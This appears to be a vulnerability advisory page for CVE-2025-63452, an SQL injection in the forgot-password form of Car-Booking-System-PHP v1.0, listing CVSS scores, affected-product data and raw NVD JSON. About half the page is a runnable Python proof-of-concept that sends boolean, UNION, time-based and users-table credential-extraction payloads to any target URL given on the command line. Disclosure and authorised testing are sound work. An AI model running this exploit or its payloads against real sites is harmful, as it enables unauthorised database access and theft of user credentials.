Security Vulnerability Report
中文
CVE-2025-63452 CVSS 9.4 CRITICAL

CVE-2025-63452

Published: 2025-11-03 16:15:38
Last Modified: 2025-11-07 20:46:43

Description

Car-Booking-System-PHP v.1.0 is vulnerable to SQL Injection in /carlux/forgot-pass.php.

CVSS Details

CVSS Score
9.4
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:car-booking-system-php_project:car-booking-system-php:1.0:*:*:*:*:*:*:* - VULNERABLE
Car-Booking-System-PHP v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-63452 SQL Injection PoC for Car-Booking-System-PHP v1.0 # Target: /carlux/forgot-pass.php def exploit_sql_injection(target_url, payload): """ Exploit SQL Injection in forgot-password function """ # Target endpoint endpoint = f"{target_url}/carlux/forgot-pass.php" # Malicious payload for SQL injection data = { 'email': payload, # Inject SQL in email parameter 'submit': 'Submit' } try: response = requests.post(endpoint, data=data, timeout=10) return response.text except requests.exceptions.RequestException as e: return f"Error: {str(e)}" # Example payloads payloads = [ # Basic SQL injection - Boolean based "[email protected]' AND 1=1-- -", # Union-based injection to extract database version "[email protected]' UNION SELECT NULL,version(),user(),database()-- -", # Extract users table "[email protected]' UNION SELECT NULL,username,password FROM users-- -", # Time-based blind injection "[email protected]'; SLEEP(5)-- -" ] if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com") sys.exit(1) target = sys.argv[1].rstrip('/') print(f"[*] Testing CVE-2025-63452 on {target}") for i, payload in enumerate(payloads): print(f"\n[+] Testing payload {i+1}: {payload[:50]}...") result = exploit_sql_injection(target, payload) print(f"[*] Response length: {len(result)} bytes")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63452", "sourceIdentifier": "[email protected]", "published": "2025-11-03T16:15:37.640", "lastModified": "2025-11-07T20:46:42.993", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Car-Booking-System-PHP v.1.0 is vulnerable to SQL Injection in /carlux/forgot-pass.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:car-booking-system-php_project:car-booking-system-php:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "20E6E810-0009-4D9D-828A-68A38A642BEE"}]}]}], "references": [{"url": "https://github.com/sanin-s1r3n/CVE-Research/blob/main/CVE-13", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}